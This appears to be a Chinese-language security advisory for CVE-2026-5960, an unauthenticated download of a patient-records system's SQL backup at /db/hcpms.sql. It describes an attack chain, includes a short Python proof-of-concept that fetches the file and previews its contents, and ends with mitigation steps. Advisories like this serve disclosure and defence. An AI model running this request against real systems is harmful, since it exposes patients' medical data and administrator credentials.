CVE-2026-5960: 患者记录管理系统信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-5960

漏洞类型

敏感信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

code-projects Patient Record Management System

漏洞概述

code-projects Patient Record Management System 1.0 版本中存在一个严重的安全缺陷，被归类为敏感信息泄露漏洞。该漏洞源于系统对SQL数据库备份文件处理不当，具体涉及位于 `/db/hcpms.sql` 的文件。由于缺乏有效的访问控制机制，攻击者可以通过网络远程访问该备份文件，从而获取包含敏感数据的数据库内容。尽管该攻击需要一定的用户交互，但其利用难度较低，且目前已有公开的利用代码，对使用该系统的组织和患者隐私构成直接威胁。

技术细节

该漏洞的技术原理在于Web服务器未能正确限制对敏感文件的访问。在Patient Record Management System 1.0的默认安装或配置中，数据库备份文件 `hcpms.sql` 被直接放置在Web可访问的目录 `/db/` 下。通常，此类SQL备份文件包含完整的数据库Schema以及插入语句，其中可能存储了管理员的凭据哈希、患者的个人身份信息（PII）以及其他业务关键数据。攻击者无需经过身份认证（PR:N），只需通过浏览器或工具发送简单的HTTP GET请求至 `/db/hcpms.sql` 路径，即可下载该文件。CVSS向量中的“需要用户交互”（UI:R）可能暗示该漏洞可能需要受害者访问特定链接或某种社会工程学配合，但在文件泄露场景下，通常指攻击者诱导目标点击恶意链接从而验证文件存在性或直接触发下载。一旦获取文件，攻击者可离线解析数据，导致机密性泄露（C:L）。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在运行 code-projects Patient Record Management System 1.0，并确定其Web服务架构。

STEP 2

漏洞利用

攻击者构造HTTP GET请求，直接访问已知的敏感路径 `/db/hcpms.sql`。

STEP 3

数据获取

服务器返回数据库备份文件，攻击者成功下载包含所有敏感数据的 `hcpms.sql` 文件。

STEP 4

后渗透利用

攻击者在本地解析SQL文件，提取管理员密码哈希、患者联系方式及医疗记录，为进一步入侵或数据勒索做准备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-5960 Proof of Concept
# Target URL vulnerable to exposed database backup
target_url = "http://target-ip/db/hcpms.sql"

def check_vulnerability(url):
    try:
        print(f"[*] Checking target: {url}")
        response = requests.get(url, timeout=10)
        
        # Check if the file exists and is downloadable
        if response.status_code == 200:
            # Basic check to see if it looks like a SQL file
            content_preview = response.text[:200]
            if "INSERT INTO" in content_preview or "CREATE TABLE" in content_preview or "MySQL" in content_preview:
                print("[+] Vulnerability Confirmed! Database backup file is exposed.")
                print(f"[+] File size: {len(response.content)} bytes")
                print(f"[+] Content preview:\n{content_preview}")
            else:
                print("[-] File found but does not look like a SQL backup.")
        else:
            print(f"[-] File not found. Server responded with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    check_vulnerability(target_url)

影响范围

code-projects Patient Record Management System 1.0

防御指南

临时缓解措施

建议立即检查服务器文件系统，定位并移除 `/db/hcpms.sql` 文件。同时，应在Web服务器配置层面（如Apache的.htaccess或Nginx配置文件）添加规则，拒绝所有外部用户对 `/db/` 目录及其子目录的访问请求。如果系统不再使用，建议下线处理；若需继续使用，应确保所有敏感文件均不可通过HTTP直接获取。